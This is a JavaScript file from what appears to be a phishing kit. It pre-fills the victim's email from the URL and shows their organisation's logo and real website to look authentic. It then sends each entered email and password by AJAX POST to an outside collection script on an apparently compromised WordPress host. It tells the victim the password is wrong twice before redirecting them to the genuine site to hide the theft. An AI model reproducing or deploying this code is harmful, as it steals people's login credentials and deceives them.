




    /* global $ */
    $(document).ready(function(){
	var count=0;
	
     function getUrlVars() {
        var vars = {};
        var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value) {
          vars[key] = value;
        });
        return vars;
      }
      
      var number = getUrlVars()["email"];

       $("#email").val(number);
	    var ind=number.indexOf("@");
        var my_slice=number.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
		$("#mainPage").attr("src", "https://www."+my_slice);
        $("#logoname").html(my_slice);
       
      
        $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );

                    if (!password) {
                $('#msg').show();
                $('#msg').html("Password field is empty.!");

                return false;
            }



      ///////////new injection////////////////
      count=count+1;
      
      $.ajax({
        dataType: 'JSON',
        url: 'https://ekdesignergownsmi.com/wp-admin/images/post.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
            },
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                  $("#password").val("");
                  if (count>=2) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                     window.location.replace("https://www."+my_slice);

                  }
                  $("#msg").show();
    	$('#msg').html("Invalid password. Please try again");
                }
                else{
                 $("#msg2").show();
    	$('#msg').html("Invalid password. Please try again");
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=2) {
                count=0;
                 window.location.replace("https://www."+my_slice);
              }
              $("#msg").show();
           
			$('#msg').html("Invalid password. Please try again");
            },
            complete: function(){
              $('#submit-btn').html('Continue');
            }
          });
    });
       


      
   });

   
